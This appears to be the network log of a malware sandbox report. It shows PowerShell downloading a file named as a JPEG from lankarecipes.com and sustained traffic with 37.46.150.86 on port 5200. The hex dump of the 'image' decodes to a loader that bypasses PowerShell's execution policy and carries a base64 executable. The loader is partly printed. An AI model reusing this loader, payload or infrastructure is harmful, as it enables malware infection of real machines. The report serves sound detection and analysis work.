Jan 8, 2021 09:36:20.219964027 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219988108 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.219996929 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220010996 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220022917 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220033884 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220057011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220078945 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220083952 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220105886 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220113993 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220129967 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220151901 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220160961 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220175028 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220200062 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220207930 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220223904 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220246077 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220247984 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220268011 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220289946 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220294952 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220319033 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220340014 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220361948 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220366001 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220386028 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220401049 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220410109 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220432043 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220437050 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220453978 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220479012 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220494986 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220501900 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220525980 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220530987 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220551968 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220586061 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220608950 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220629930 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220654964 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220675945 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220679045 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220702887 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220715046 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220726013 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220747948 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220750093 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220769882 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220793009 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220794916 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220815897 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220839977 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220849037 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220864058 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220886946 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220886946 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220918894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220936060 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.220944881 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220967054 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220989943 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.220994949 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221013069 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221034050 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221039057 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221056938 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221079111 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221081018 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221107006 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221129894 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221132040 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221153021 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221172094 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221175909 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221199989 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221216917 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221224070 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221247911 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221272945 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221291065 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221297979 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221321106 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221332073 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221344948 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221369028 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221370935 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221410036 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221430063 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221452951 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221474886 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221496105 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221506119 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221522093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221538067 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221544981 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221568108 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221590996 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221601963 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221616030 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221640110 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221640110 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221664906 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221683025 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221688032 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221710920 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221731901 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221733093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221756935 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221776009 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221779108 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221807957 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221824884 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221839905 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221851110 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221863985 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221875906 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221889019 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221900940 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221923113 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221946001 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221966028 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.221967936 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.221992970 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222011089 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.222018003 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222039938 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222040892 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.222064018 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222079992 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.222086906 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222110987 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222131968 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222145081 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.222153902 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222178936 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.222183943 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.222220898 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.279895067 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341448069 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341474056 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341491938 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341510057 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341527939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341550112 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341571093 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341566086 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341588974 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341609001 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341625929 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341644049 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341660976 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341679096 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341701031 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341721058 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341738939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341757059 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341773987 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341790915 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341799974 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341811895 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341830015 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341837883 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341854095 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341864109 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341875076 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341890097 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341895103 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341913939 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341932058 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341943026 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341948986 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341968060 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.341969967 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.341984987 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.342008114 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.342009068 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.342027903 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.342046022 CET	5200	49747	37.46.150.86	192.168.2.4
Jan 8, 2021 09:36:20.342056990 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:20.342082977 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:21.702375889 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:23.255680084 CET	49747	5200	192.168.2.4	37.46.150.86
Jan 8, 2021 09:36:23.333950996 CET	5200	49747	37.46.150.86	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2021 09:34:22.592523098 CET	54531	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:22.648827076 CET	53	54531	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:23.071926117 CET	49714	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:23.131162882 CET	53	49714	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:24.094037056 CET	49714	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:24.153039932 CET	53	49714	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:25.098613977 CET	49714	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:25.157569885 CET	53	49714	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:26.267925024 CET	58028	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:26.315888882 CET	53	58028	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:27.099524021 CET	49714	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:27.158677101 CET	53	49714	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:31.139883995 CET	49714	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:31.199232101 CET	53	49714	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:36.183619976 CET	53097	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:36.231576920 CET	53	53097	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:42.078037977 CET	49257	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:42.138613939 CET	53	49257	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:52.840903044 CET	62389	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:53.042937040 CET	53	62389	8.8.8.8	192.168.2.4
Jan 8, 2021 09:34:59.895586014 CET	49910	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:34:59.953301907 CET	53	49910	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:01.014930964 CET	55854	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:01.071927071 CET	53	55854	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:01.438055038 CET	64549	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:01.486090899 CET	53	64549	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:01.652700901 CET	63153	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:01.711103916 CET	53	63153	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:02.415011883 CET	52991	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:02.463038921 CET	53	52991	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:03.068269968 CET	53700	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:03.116374016 CET	53	53700	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:03.436655045 CET	51726	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:03.501081944 CET	53	51726	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:03.799073935 CET	56794	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:03.847184896 CET	53	56794	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:04.461044073 CET	56534	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:04.519684076 CET	53	56534	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:05.148782015 CET	56627	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:05.199683905 CET	53	56627	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:06.196203947 CET	56621	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:06.255413055 CET	53	56621	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:07.485481977 CET	63116	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:07.533351898 CET	53	63116	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:08.052906990 CET	64078	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:08.103848934 CET	53	64078	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:17.736723900 CET	64801	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:17.794236898 CET	53	64801	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:26.740106106 CET	61721	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:26.788059950 CET	53	61721	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:27.832349062 CET	51255	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:27.883151054 CET	53	51255	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:28.678677082 CET	61522	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:28.737862110 CET	53	61522	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:29.505609989 CET	52337	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:29.553688049 CET	53	52337	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:30.348684072 CET	55046	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:30.396579981 CET	53	55046	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:31.162801981 CET	49612	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:31.210721970 CET	53	49612	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:32.180682898 CET	49285	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:32.228559971 CET	53	49285	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:33.177069902 CET	50601	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:33.228005886 CET	53	50601	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:35.227447033 CET	60875	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:35.278220892 CET	53	60875	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:36.259691954 CET	56448	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:36.308437109 CET	53	56448	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:37.616547108 CET	59172	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:37.667363882 CET	53	59172	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:38.440494061 CET	62420	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:38.488507986 CET	53	62420	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:40.361651897 CET	60579	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:40.409610033 CET	53	60579	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:41.209323883 CET	50183	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:41.257204056 CET	53	50183	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:42.041253090 CET	61531	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:42.091996908 CET	53	61531	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:43.765337944 CET	49228	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:43.824677944 CET	53	49228	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:46.709853888 CET	59794	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:46.757631063 CET	53	59794	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:55.405963898 CET	55916	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:55.453874111 CET	53	55916	8.8.8.8	192.168.2.4
Jan 8, 2021 09:35:58.299429893 CET	52752	53	192.168.2.4	8.8.8.8
Jan 8, 2021 09:35:58.366627932 CET	53	52752	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 8, 2021 09:34:52.840903044 CET	192.168.2.4	8.8.8.8	0x9042	Standard query (0)	lankarecipes.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 8, 2021 09:34:53.042937040 CET	8.8.8.8	192.168.2.4	0x9042	No error (0)	lankarecipes.com		192.185.236.165	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

lankarecipes.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49728	192.185.236.165	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 8, 2021 09:34:53.247750044 CET	110	OUT	GET /mages.jpg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: lankarecipes.com Connection: Keep-Alive
Jan 8, 2021 09:34:53.435033083 CET	111	IN	HTTP/1.1 200 OK Date: Fri, 08 Jan 2021 08:34:53 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Wed, 06 Jan 2021 16:11:54 GMT Accept-Ranges: bytes Content-Length: 453227 Keep-Alive: timeout=5, max=75 Content-Type: image/jpeg Data Raw: 20 53 45 54 2d 45 58 65 43 55 74 49 6f 6e 50 6f 6c 69 43 79 20 42 79 70 41 53 73 20 2d 73 43 6f 70 65 20 50 52 6f 43 45 53 73 20 2d 46 4f 72 43 45 20 3b 20 24 6b 61 45 43 43 66 6c 68 41 6e 56 56 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 41 33 59 73 54 61 63 77 4f 71 69 58 4d 44 71 6f 6c 7a 41 36 71 4a 38 42 2b 6b 69 58 49 44 71 6f 6c 46 4a 61 65 4a 63 67 4f 71 69 54 77 68 6f 34 6c 32 41 36 71 4a 63 77 4f 71 69 58 45 44 71 6f 6c 53 61 57 4e 6f 63 77 4f 71 69 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 55 41 37 4e 2f 31 58 77 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 41 51 73 42 42 67 41 41 38 41 4d 41 41 47 41 41 41 41 41 41 41 41 41 63 45 67 41 41 41 42 41 41 41 41 41 41 42 41 41 41 41 45 41 41 41 42 41 41 41 41 41 51 41 41 41 45 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 48 41 45 41 41 41 51 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 51 41 41 41 51 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 41 4d 45 41 46 41 41 41 41 41 41 4d 41 51 41 61 43 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 41 51 41 2f 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 42 30 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4c 6e 52 6c 65 48 51 41 41 41 41 55 37 67 4d 41 41 42 41 41 41 41 44 77 41 77 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 59 43 35 79 5a 47 46 30 59 51 41 41 2f 41 6b 41 41 41 41 41 42 41 41 41 45 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 41 75 5a 47 46 30 59 51 41 41 41 45 67 56 41 41 41 41 45 41 51 41 41 42 41 41 41 41 41 51 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 44 41 4c 6e 4a 7a 63 6d 4d 41 41 41 42 6f 4c 41 41 41 41 44 41 45 41 41 41 77 41 41 41 41 49 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 43 35 79 5a 57 78 76 59 77 41 41 2b 67 73 41 41 41 42 67 42 41 41 41 45 41 41 41 41 46 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 